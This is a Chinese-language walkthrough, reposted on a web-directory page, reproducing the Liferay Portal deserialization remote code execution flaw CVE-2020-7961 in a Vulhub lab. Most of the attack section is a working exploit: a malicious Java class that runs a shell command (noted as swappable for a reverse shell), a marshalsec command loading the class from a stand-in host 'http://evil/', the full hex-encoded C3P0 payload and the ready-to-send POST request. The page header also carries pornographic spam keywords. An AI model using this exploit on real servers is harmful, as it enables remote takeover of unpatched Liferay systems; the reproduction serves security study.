日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

Liferay Portal CE是一款用來快速構建網站的開源系統。在7.2.1 CE GA2之前的Liferay Portal中,對不可信數據的反序列化允許遠程攻擊者通過JSON web服務(JSONWS)執行任意代碼。

官方網站

https://www.oschina.net

影響范圍

Liferay Portal 6.1.XLiferay Portal 6.2.XLiferay Portal 7.0.XLiferay Portal 7.1.XLiferay Portal 7.2.X

參考鏈接:

· https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html

· https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Liferay%20Portal%20CVE-2020-7961%20%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/

· https://xz.aliyun.com/t/7499

· https://xz.aliyun.com/t/7485

NVD評分

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

漏洞環境搭建

Vulhub

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

# Download the latest version of the vulhub git clone https://github.com/vulhub/vulhub.git  # Entry vulnerability directory cd /path/to/vuln/ # Compile (optional) Docker-compose build # Run docker-compose up -d 
Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

然后我們cd /root/vulhub/liferay-portal

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

執行如下命令啟動Liferay Portal 7.2.0 GA1:

docker-compose up -d

啟動成功后,訪問http://your-ip:8080即可查看到默認首頁。如果環境一直沒有成功啟動,可能是內存不足,請使用至少2G內存的服務器運行這個環境。頁面如下

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

漏洞復現

首先準備一個惡意的JAVA類,編譯:

// javac LifExp.java

public class LifExp {

 

static {

try {

String[] cmd = {"bash", "-c", "touch /tmp/success"};//當然也可以是反彈shell

java.lang.Runtime.getRuntime().exec(cmd).waitFor();

} catch ( Exception e ) {

e.printStackTrace();

}

}

}

在class文件的目錄下運行一個HTTP文件服務,命令如下:

$ ls

LifExp.class LifExp.java

$ Python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

因為目標Java版本較高,我們使用利用鏈是com.mchange.v2.c3p0.WrApperConnectionPoolDataSource,借助marshalsec(https://github.com/mbechler/marshalsec)來生成一個適用于Jackson的POC:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://evil/ LifExp

其中,http://evil/是剛才啟動的保存了惡意class文件的Web服務,LifExp是惡意類名。

 

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

生成的Payload是Jackson使用的,我們只需按照Liferay Portal的形式,即+參數名:類名=值,來修改這個Payload:

+defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c6966457870740017687474703a2f2f3137322e31372e302e313a383030302f740003466f6f;"}

將上述Payload合并到HTTP請求中發送:

POST /api/jsonws/invoke HTTP/1.1

Host: your-ip:8080

Content-Length: 1346

Content-Type: application/x-www-form-urlencoded

Connection: close

 

cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c6966457870740017687474703a2f2f3137322e31372e302e313a383030302f740003466f6f;"}

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

進入容器中查看,發現已經成功執行touch /tmp/success:

 

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 


Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 

總的來說,又是一個反序列化漏洞,在java里面反序列化漏洞真的屢見不鮮了,新穎的是這里是利用Jackson構造的poc,給我們以后挖序列化洞多了一種思路

Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 


Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

 


Liferay Portal CE 系統反序列化RCE漏洞復現(CVE-2020-7961)

分享到:
標簽:Liferay Portal CE
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定